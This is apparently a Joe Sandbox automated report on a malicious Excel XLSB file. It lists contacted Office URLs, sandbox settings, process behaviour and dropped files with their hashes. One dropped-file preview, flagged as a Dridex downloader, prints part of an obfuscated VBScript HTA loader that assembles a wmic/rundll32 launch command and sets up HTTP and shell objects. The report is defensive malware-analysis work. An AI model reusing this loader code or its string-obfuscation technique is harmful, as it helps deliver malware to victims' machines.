                                              https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                high
                                                https://login.windows.net/common/oauth2/authorize$EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://login.windows.net/common/oauth2/authorize%EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://api.powerbi.com/v1.0/myorg/groupsBearerEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                          high
                                                          https://www.odwebp.svc.msEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.netEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                high
                                                                https://substrate.office.comUmEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://api.onedrive.comMBIEXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                    high
                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseqbEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://ncus.contentsync.EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonBEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                            high
                                                                            https://api.aadrm.com/Kq#EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://substrate.office.comPEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                              high
                                                                              https://clients.config.office.net/user/v1.0/android/policiestf&EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                  high
                                                                                  https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    low
                                                                                    https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickStaEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosAACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                          high
                                                                                          https://login.windows.net/common/oauth2/authorizefEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://login.windows.net/common/oauth2/authorizeXEXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://portal.office.com/account/?ref=ClientMeControl9EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://dataservice.o365filtering.comvdEXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                  high
                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drfalse
                                                                                                      high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              No contacted IP infos

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                              Analysis ID:532553
                                                                                                                                                              Start date:02.12.2021
                                                                                                                                                              Start time:12:56:11
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 5m 58s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Sample file name:4310352755503838173672.xlsb
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                              Run name:Potential for more IOCs and behavior
Number of new started processes analysed:18
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal96.troj.expl.evad.winXLSB@5/5@0/0
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 2
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Active AutoShape Object
                                                                                                                                                              • Active Picture Object
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 92.122.145.220, 52.109.76.68, 52.109.8.24, 52.109.8.25
                                                                                                                                                              • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Execution Graph export aborted for target EXCEL.EXE, PID 6980 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

Time      Type             Description
12:57:59  API Interceptor  1x Sleep call for process: WMIC.exe modified
12:58:00  API Interceptor  1x Sleep call for process: mshta.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              No context

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASN

                                                                                                                                                              No context

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              No context

                                                                                                                                                              Created / dropped Files

                                                                                                                                                              C:\ProgramData\lvDMlIDBF.rtf
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4814
                                                                                                                                                              Entropy (8bit):5.043960662622874
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:FOBD0klec+c4mT3TcIr+BnSR5DHbDiyYnGdCmoY3ymoCJ8:OxB45VU5vDijna2myay
                                                                                                                                                              MD5:F36D5F88F66FB329BE532A92C60C4723
                                                                                                                                                              SHA1:F61F29BF96EA340E7C09D40E9D1A8A0B068A42DE
                                                                                                                                                              SHA-256:B2A8E8D7B6C0B5DE835F54959A9291344D1DB2EA0C68988E482680B00E0A029E
                                                                                                                                                              SHA-512:EBA2A80C6C8EF73A22F97B02021610AA74D1E66D5C41D76880E83CC863DE5C1A0E7B9ABE67331119747E7DA8485705942CE03AE5B80BBBBBAEA36424874A91FF
                                                                                                                                                              Malicious:true
                                                                                                                                                              Yara Hits:
                                                                                                                                                              • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\lvDMlIDBF.rtf, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..z_B_S_N_O_c_a = "wm" & Chr(105) & "" & "c p" & "ro" & "ces" & "s " & "cal" & Chr(108) & " c" & "re" & "" & "ate" & Chr(32) & Chr(34) & "run" & Chr(100) & "" & "ll3" & Chr(50) & ".ex" & "e C" & Chr(58) & "" & "\\P" & "ro" & "gra" & "mD" & "" & "ata" & "\s" & "" & Chr(110) & "" & "igg" & "" & "" & "er" & "" & Chr(46) & "bin" & " G" & Chr(101) & "tNT" & "Ver" & "sio" & Chr(110) & "" & Chr(34) & ""..Set a_E_o_X_s_L_v_k_D_M_W_J = CreateObject(Chr(77+1-1) & "SX" & Chr(77+1-1) & "" & Chr(76+1-1) & Chr(50+1-1) & Chr(46+1-1) & "Ser" & "ver" & "" & "XM" & Chr(76+1-1) & "HTT" & "P." & "" & "" & "" & Chr(54+1-1) & ".0")....y_i_V_z_t_Z_p_F_b_f_Z_D_y_S = "Ws" & "" & Chr(99+1-1) & "" & "" & "rip" & "" & "t.S" & Chr(104+1-1) & "" & Chr(101+1-1) & "ll" & ""
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):140183
                                                                                                                                                              Entropy (8bit):5.357927454086073
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:XcQIfgxrBdA3gBwtnQ9DQW+zCA4Ff7nXbovidXiE6LWmE9:FuQ9DQW+zcXfH
                                                                                                                                                              MD5:AA1E3097C431DB3CB150864689627F50
                                                                                                                                                              SHA1:2B60476BD0560F6076E1BC91FCA3949D6422ACD9
                                                                                                                                                              SHA-256:58702FB28EE1B0B4231250F242AFA5A0A4BAE508B7F0EDA2FDC5392972D071F3
                                                                                                                                                              SHA-512:39D7BD8E8EC52465C8FD94F42BB045307EBF36BFAAA96F3ACAE9A97150442C845AE9F6937B75D0FE807D573DC8C0E043D4CB20D017FA94A295739D10EFD88438
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T11:57:02">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\59FECB3D.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 800 x 400, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):46618
                                                                                                                                                              Entropy (8bit):7.952644920400089
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:768:Luo+bYjgUZIXsg6KJLDTRxSKj91uKHacXGaFI9mJveLsTpqurZ1G8JawY1B:LujUjtZIcK9TjSK+ua7aFIMKIpq3HH
                                                                                                                                                              MD5:BD23AADA4497DF81DFF5354688F31E37
                                                                                                                                                              SHA1:666BAD186C4E60B5C2E35D9B4D5B636750873112
                                                                                                                                                              SHA-256:8460FE3B20B18F3BC0A7C66B29AB9AD503CB5DA8C511BC45987DAF4647E00560
                                                                                                                                                              SHA-512:6795A07A5FBD76D9F0A4E5056685585B3C66400E69AFB9139613DDA0A887F0018FBAD824C0377C9E1FA971A004911DF5474334824DA409EFEA6AB27092F14BCE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              C:\Users\user\Desktop\~$4310352755503838173672.xlsb
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                              Malicious:true
                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                              Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              \Device\ConDrv
                                                                                                                                                              Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):160
                                                                                                                                                              Entropy (8bit):5.083203110114614
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnXR/JQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egNeAiv/
                                                                                                                                                              MD5:C9157C8B0DCCF553D0B379A71A06E5E3
                                                                                                                                                              SHA1:47920AD40A79287D2429496C06CA07E1CC2E230F
                                                                                                                                                              SHA-256:AA69D1D630F1D62A4AD91961EB222B2923CE73F2B368C0DFD47C159A94A94136
                                                                                                                                                              SHA-512:436555954B1EA100B937CA1FD14998244D0BEBBDA33E4A62C11CD94802A399A66A39EBD2475FD424840AF40EBD1AF7260766E0E84A1E84FA4431078603133230
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:low
                                                                                                                                                              Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5244;...ReturnValue = 0;..};....

                                                                                                                                                              Static File Info

                                                                                                                                                              General

                                                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                                                              Entropy (8bit):7.8592249378591506
                                                                                                                                                              TrID:
                                                                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                              • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                              • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                              File name:4310352755503838173672.xlsb
                                                                                                                                                              File size:76354
                                                                                                                                                              MD5:88a363b14590b0c0aab8d954ac3e1b5c
                                                                                                                                                              SHA1:af7b370945a8bcec0a979c93ef83770073f2b08a
                                                                                                                                                              SHA256:1004873035711456c20f311b16484154554d13e060dd2bbb2c0c2ddd4e73ced4
